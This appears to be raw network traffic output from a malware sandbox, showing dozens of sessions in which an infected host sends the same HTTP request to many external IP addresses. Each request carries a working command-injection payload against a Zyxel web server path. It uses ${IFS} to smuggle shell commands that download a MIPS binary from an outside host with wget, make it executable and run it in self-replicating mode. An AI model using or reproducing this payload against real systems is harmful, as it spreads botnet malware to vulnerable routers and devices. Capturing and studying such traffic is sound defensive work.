                                            Feb 2, 2024 06:21:19.772542953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6164192.168.2.154588091.28.222.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772569895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6165192.168.2.1544580186.124.146.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772618055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6166192.168.2.1556704108.236.24.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772650003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6167192.168.2.1533570151.101.85.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772701025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6168192.168.2.1558468168.187.252.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772737026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6169192.168.2.1547322108.14.64.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772770882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6170192.168.2.1555208191.158.112.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.784898043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6171192.168.2.1546724203.250.130.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.784940958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6172192.168.2.1542114125.97.43.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.784970999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6173192.168.2.155195088.196.255.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785007954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6174192.168.2.15483908.113.132.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785018921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6175192.168.2.1552210218.223.59.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785079002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6176192.168.2.1540866213.102.8.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785115957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6177192.168.2.155097448.112.214.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785178900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6178192.168.2.1547054140.56.179.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785212994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6179192.168.2.155970047.219.166.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785268068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6180192.168.2.154477077.209.206.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785305023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6181192.168.2.1542342205.172.16.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785353899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6182192.168.2.15606729.15.161.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785408020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6183192.168.2.1551076199.211.168.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785408020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6184192.168.2.1545980130.236.213.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785449982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6185192.168.2.1554944150.134.12.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785484076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6186192.168.2.153509487.242.98.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785536051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6187192.168.2.1548602134.57.118.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785562992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6188192.168.2.1536392135.35.232.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785599947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6189192.168.2.154981271.179.54.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785644054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6190192.168.2.155509264.202.7.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785671949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6191192.168.2.155984854.254.222.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785701990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6192192.168.2.155550675.247.223.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785732031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6193192.168.2.1538920175.161.89.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785751104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6194192.168.2.1543108142.173.222.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785778999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6195192.168.2.1547432135.63.45.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785815001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6196192.168.2.1535404177.11.253.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785867929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6197192.168.2.1546210203.82.113.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785882950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6198192.168.2.153386247.126.208.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785938025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6199192.168.2.1535096158.232.158.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.785980940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6200192.168.2.1550444144.40.232.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786032915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6201192.168.2.1549406121.145.68.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786063910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6202192.168.2.1539376117.58.193.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786084890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6203192.168.2.156011677.212.72.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786106110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6204192.168.2.1541944189.159.38.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786139965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6205192.168.2.1557896114.199.115.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786173105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6206192.168.2.15544409.210.157.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786211967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6207192.168.2.153442464.31.58.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786241055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6208192.168.2.1543250207.249.216.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786252975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6209192.168.2.155062872.22.26.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786288023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6210192.168.2.154048499.0.90.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786338091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6211192.168.2.154501431.249.76.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786382914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6212192.168.2.153526080.119.110.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786410093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6213192.168.2.1548394178.175.150.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786441088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6214192.168.2.1535746108.48.20.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786535978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6215192.168.2.155015281.19.179.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786549091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6216192.168.2.1538728155.26.43.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786561012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6217192.168.2.153903086.223.11.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786623955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6218192.168.2.155464666.104.207.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786659002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6219192.168.2.153501651.31.113.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786679029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6220192.168.2.1549246129.9.21.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786739111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6221192.168.2.154582686.63.172.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786788940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6222192.168.2.1536408117.194.190.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786813021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6223192.168.2.154336476.160.170.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786884069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6224192.168.2.15554225.76.32.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786916971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6225192.168.2.1545638140.115.102.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786974907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6226192.168.2.1548704130.169.93.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.786981106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6227192.168.2.1545878165.206.184.162443
                                            TimestampBytes transferredDirectionData
